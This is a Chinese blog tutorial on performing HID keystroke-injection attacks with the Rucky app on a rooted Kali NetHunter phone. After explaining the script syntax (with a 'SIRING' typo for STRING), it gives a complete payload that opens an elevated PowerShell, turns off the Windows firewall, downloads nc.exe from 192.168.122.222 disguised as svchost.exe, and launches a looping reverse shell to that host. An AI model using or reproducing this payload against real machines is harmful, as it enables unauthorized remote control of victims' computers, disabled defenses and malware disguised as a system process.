首页 > 其他分享 >NetHunter使用Rucky实现HID键盘数据模拟攻击

NetHunter使用Rucky实现HID键盘数据模拟攻击

时间:2023-06-04 15:13:08浏览次数:43  
标签:Rucky STRING cmd DELAY HID ENTER NetHunter

知识概要:

  • NetHunter:是Kali Linux推出的移动Android端的系统
  • Rucky:是一种基于 HID 设备的攻击工具,其本质是一个可编程的键盘模拟器,可以用于快速执行各种攻击,例如在目标计算机上执行特定的命令、窃取密码等。
  • HID:是指人体接口设备,常见的 HID 包括键盘、鼠标、摄像头等 USB 设备。攻击者可以在 HID 设备上植入恶意代码,然后通过连接该设备到计算机,让计算机误认为该 HID 设备是一个普通的键盘或鼠标,并执行隐藏的恶意操作

首先你的Android设备需要拥有ROOT权限访问你的硬件借口,第二是你的USB数据口需要你的内核开放HID攻击的功能,刷入Nethunter的内核是支持的,如果需要刷入NetHunter可以查看我之前刷入NetHunter的文档

好的这里我们开始实验,可以在NetHunter商店中下载Rucky,可以在Github中下载比较新的版本: https://github.com/mayankmetha/Rucky

如果想要深入的了解可以如查阅Rucky语法的相关资料,基本的语法就是

DELAY 2000
GUI r
SIRING cmd
ENTER
DELAY 2000
SIRING whoami

例如上述:

  • DELAY 2000: 2000表示需要等待2秒
  • GUI r: GUI键盘上的Win键,r表示输入r
  • SIRING : 往窗口输入字符cmd
  • cmd: 模拟键盘摁下ENTER回车键

所以上述脚本就是会打开cmd窗口,然后执行whoami命令

例如下方下载nc.exe,然后使用`nc.exe`反弹shell的脚本

DELAY 2000
GUI  r
DELAY 300
STRING powershell 
CTRL SHIFT ENTER
DELAY 2000

STRING netsh advfirewall set allprofiles state off 
ENTER 
DELAY 800
STRING exit
ENTER
DELAY 1000


GUI r
DELAY 1000

STRING cmd
ENTER
DELAY 1000

STRING echo (wget 'http://192.168.122.222:8080/nc.exe' -OutFile svchost.exe) > b.ps1
ENTER
DELAY 1000
STRING powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 3000

STRING echo while($true){./svchost.exe 192.168.122.222 443 -e cmd.exe -d} > c.ps1
ENTER
DELAY 1000

STRING start /min powershell -ExecutionPolicy ByPass -File c.ps1 & exit
DELAY 1000
ENTER

标签:Rucky,STRING,cmd,DELAY,HID,ENTER,NetHunter
From: https://www.cnblogs.com/Junglezt/p/17452413.html

相关文章

  • NetHunter使用教程1——安装
    废话如下:网络猎人是什么?这里就不介绍了,总之非常强大!有的人说不好用?那可能是你没用到家,想一下手机手机,手上的计算机,攻击又隐蔽。以前玩过andrax,奈何作者太狂了,现在凉了!唉,一个还不错的项目呀!正片:这篇博客就记录一下我的安装过程吧!设备信息:华为畅享7root安卓7.1(古董手机了)......
  • nethunter终端进入KALI时报错问题
    在我的设备安装Nethunter成功后,使用NetHunter内置的连接终端工具连接时报了一个这样的错误zsh:failedtoloadmodule`zsh/zle':/usr/lib/aarch64-linux-gnu/zsh/5.9/zsh/zle.so:cannotopensharedobjectfile:Nosuchfileordirectorykali#使用SSH连接也是一样的错......
  • BOSHIDA DC电源模块超宽电压输入和输出的问题
    BOSHIDADC电源模块超宽电压输入和输出的问题DC电源模块是一种重要的电子元器件,用于将高电压或低电压转换为设备所需的电源电压。通常情况下,DC电源模块的输入电压和输出电压都有一定的范围。然而,在某些情况下,输入电压或输出电压可能会超出规定的范围,这可能会导致电源模块的故障或......
  • 使用OnePlus 6T(一加6T)刷入 Kali NetHunter的操作总结
    前景概述:看到网上有人用手机进行BadUSB攻击,自己也幻想了一下在手机中使用KaliLinux的场景,看到Kali官方提供的有移动端的设备Nethunter,于是我就筹划这准备刷入这个系统。想要刷入NetHunter,并不是非常简单的事情,但是如果你有刷机基础的话,也可以是很简单的步骤。我是一个小白,一......
  • BOSHIDA 电源模块高低温试验的应用原理
    BOSHIDA电源模块高低温试验的应用原理电源模块是高低温试验的主要组成部分之一,其作用是提供试验所需的电力。在高低温试验中,温度的变化范围较大,因此电源模块需要能够在不同的温度下工作,并保证输出的稳定性和可靠性。 一般来说,电源模块应该具备以下特点:1.宽温度范围,能够在......
  • yulong-hids 规则引擎,目前看到就是正则表达式和count技术
    规则项目提供的默认规则太简单和宽泛了,甚至包含一些错误,比如:有些不太精确,比如:另外规则引擎的匹配算法没有做优化,规则或者事件一旦多起来,server的负载会很高有些太宽泛导致误报非常高:agent在测试机才装2天就有近6w条告警,这是无法运营的,当然,规则支持细粒度控制(开关)还是很不错的3、功......
  • BOSHIDA电源模块 开关电源基础 理解EMI 电磁干扰
    BOSHIDA电源模块开关电源基础理解EMI电磁干扰能量辐射的问题通常被认为是相当复杂的,但是导致和消除EMI的基本原理是相对简单的。从根本上说,只需要认识到由于电流和电压的快速变化会产生场,这些场可以是磁场或电场。磁场会将导体中的变化电流耦合到其他地方而产生感应电压,原理是......
  • 支付宝小程序 hideTabBar 无效,出现两个 TabBar
    问题描述:使用uni-app开发的小程序,使用组件的形式做了自定义TabBar,在部分支付宝小程序中出现了两个TabBar在支付宝小程序的开发社区中也有类似问题的反馈《hideTabBarIOS失效,模拟器和安卓正常》《真机上调用my.hideTabBar无效》《tabbar隐藏在特殊情况下无效的问题》 ......
  • BOSHIDA DC电源模块的主要作用与应用
    BOSHIDADC电源模块的主要作用与应用DC电源模块是一种电源转换器件,作用是将输入电源的直流电压转换为稳定的输出直流电压,以供电子器件使用。DC电源模块主要作用是将交流电源转换为直流电源,为电子设备提供稳定的直流电源。它可以在各种电子设备和电路中,如通信设备、工业控制、计算......
  • BOSHIDA电源模块 开关电源磁性元件设计 电磁噪声的处理
    BOSHIDA电源模块开关电源磁性元件设计电磁噪声的处理众所周知,开关电源在降低装置物理尺寸和内部功耗方面具有显著的优势。然而,其快速变化的电压和电流波形富含高频谐波,它们产生的电磁干扰EMI)一直是个严重的问题。因此,电磁兼容性(EMC)的设计要求已经和电源性能同样重要,本章将介绍......